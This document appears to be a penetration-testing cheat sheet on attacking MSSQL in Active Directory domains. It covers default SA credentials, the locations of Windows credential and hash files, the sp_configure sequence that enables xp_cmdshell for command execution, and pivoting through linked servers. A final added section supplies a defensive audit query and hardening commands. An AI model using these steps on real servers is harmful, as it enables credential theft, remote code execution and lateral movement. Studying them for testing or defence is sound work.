MSSQL in AD Environments
MSSQL in Active Directory environments uses integrated authentication and linked servers, enabling lateral movement across the domain via database links.
Ports
| Port | Protocol | Description |
|---|---|---|
| 1433 | tcp | MSSQL |
| 445 | tcp | SMB |
| 88 | tcp | Kerberos |
Fingerprints
| Banner / Probe | Expected Response |
|---|---|
| nmap -sV -p <port> <target> | Service banner and version info |
| nc -nv <target> <port> | Raw banner grab |
Key Files
| Path | Description |
|---|---|
| C:\Windows\NTDS\ntds.dit | AD database with all password hashes |
| C:\Windows\System32\config\SAM | Local SAM password hashes |
| C:\Windows\System32\config\SYSTEM | System hive (boot key for hash decryption) |
| C:\Windows\System32\config\SECURITY | Security policy and cached domain credentials |
| %USERPROFILE%\AppData\Roaming\Microsoft\Credentials\ | Saved Windows credentials |
Default Credentials
| Username | Password | Context |
|---|---|---|
| sa | (empty) | SQL Server system admin |
| sa | Password123 | Common test password |
Known CVEs
| Identifier | Type | Description |
|---|---|---|
| — | Auth | Weak SA password / default SA creds |
Exploitation Primitives
| Technique | Tool / Command | Result |
|---|---|---|
| Impersonate SA | sqsh -S <target> -U sa | Connect as sysadmin |
| xp_cmdshell RCE | EXEC xp_cmdshell 'whoami' | RCE via xp_cmdshell |
| Linked Server | EXEC sp_linkedservers | Pivot through linked servers |
Notes
xp_cmdshell is disabled by default in modern SQL Server. It is an advanced option, so the `show advanced options` gate has to be opened first or the second `sp_configure` call fails; enable it with:
`EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;`
Linked servers in AD environments are a goldmine for lateral movement: a link whose login mapping stores a fixed remote account lets every caller on the source instance run queries on the target as that account, so one weak SA login can reach every instance the link chain touches.
Tools: `sqsh`, `impacket-mssqlclient`, `netexec mssql`.
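The following audit query is added here and is not part of the original cheat sheet. Run on a single instance with a sysadmin session (assumed), it reports the two conditions the notes above rely on: whether xp_cmdshell is enabled, and which linked servers map callers to a fixed remote login rather than passing their own identity through.

```sql
-- Added audit script (not from the original page); assumes a sysadmin session on the
-- instance being checked. Uses only standard SQL Server catalog views.

-- 1. Command-execution gates. Healthy baseline: value_in_use = 0 for every row.
SELECT name, value_in_use
FROM sys.configurations
WHERE name IN ('xp_cmdshell', 'show advanced options', 'Ole Automation Procedures');

-- 2. Linked servers and their login mappings.
--    local_principal_id = 0     -> default mapping that applies to every local login
--    uses_self_credential = 1   -> caller's own identity is forwarded (needs delegation)
--    remote_name IS NOT NULL    -> every matching caller becomes that fixed remote login;
--                                  a privileged remote_name here is the pivot the page describes
SELECT s.name                                AS linked_server,
       s.data_source,
       s.is_data_access_enabled,
       s.is_rpc_out_enabled,
       COALESCE(sp.name, '<all logins>')     AS local_login,
       ll.uses_self_credential,
       ll.remote_name
FROM sys.servers s
LEFT JOIN sys.linked_logins    ll ON ll.server_id    = s.server_id
LEFT JOIN sys.server_principals sp ON sp.principal_id = ll.local_principal_id
WHERE s.is_linked = 1
ORDER BY s.name, local_login;

-- 3. Hardening: reverse the enable sequence from the notes once xp_cmdshell is not needed.
EXEC sp_configure 'xp_cmdshell', 0; RECONFIGURE;
EXEC sp_configure 'show advanced options', 0; RECONFIGURE;
```

Rows from step 2 with a fixed `remote_name` that is sysadmin on the target are the links to remap to least-privileged accounts or remove.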